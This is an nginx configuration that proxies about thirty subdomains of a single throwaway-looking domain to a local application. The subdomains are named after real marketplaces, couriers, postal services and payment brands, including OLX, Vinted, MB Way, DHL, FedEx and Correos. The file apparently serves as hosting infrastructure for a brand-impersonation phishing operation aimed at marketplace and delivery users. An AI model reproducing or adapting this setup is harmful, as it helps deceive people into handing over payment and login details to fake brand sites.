gzip on;
gzip_vary on;
gzip_min_length 10240;
gzip_proxied expired no-cache no-store private auth;
gzip_types text/plain text/css text/xml text/javascript application/x-javascript application/xml;
gzip_disable "MSIE [1-6]\.";

server {
    server_name eu-zr73gs.site olx.eu-zr73gs.site mbway.eu-zr73gs.site uber.eu-zr73gs.site ctt.eu-zr73gs.site fancourier.eu-zr73gs.site subito.eu-zr73gs.site vinted.eu-zr73gs.site gumtree.eu-zr73gs.site kijiji.eu-zr73gs.site wallapop.eu-zr73gs.site milanuncios.eu-zr73gs.site correos.eu-zr73gs.site quoka.eu-zr73gs.site dhl.eu-zr73gs.site ebay-kleinanzeigen.eu-zr73gs.site blablacar.eu-zr73gs.site post.eu-zr73gs.site posta.eu-zr73gs.site dubizzle.eu-zr73gs.site emiratespost.eu-zr73gs.site bazar.eu-zr73gs.site dpd.eu-zr73gs.site bazos.eu-zr73gs.site bolha.eu-zr73gs.site salomon.eu-zr73gs.site laendleanzeiger.eu-zr73gs.site fedex.eu-zr73gs.site spedire.eu-zr73gs.site;
    location / {
        proxy_pass http://127.0.0.1:3000;
        proxy_read_timeout 3600s;
        proxy_connect_timeout 3600s;
        proxy_send_timeout 3600s;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection 'upgrade';
        proxy_set_header Host $host;
        proxy_cache_bypass $http_upgrade;
        proxy_set_header X-Real-IP $remote_addr;
        set_real_ip_from 186.2.160.0/24;
        set_real_ip_from 77.220.207.192/27;
    }
}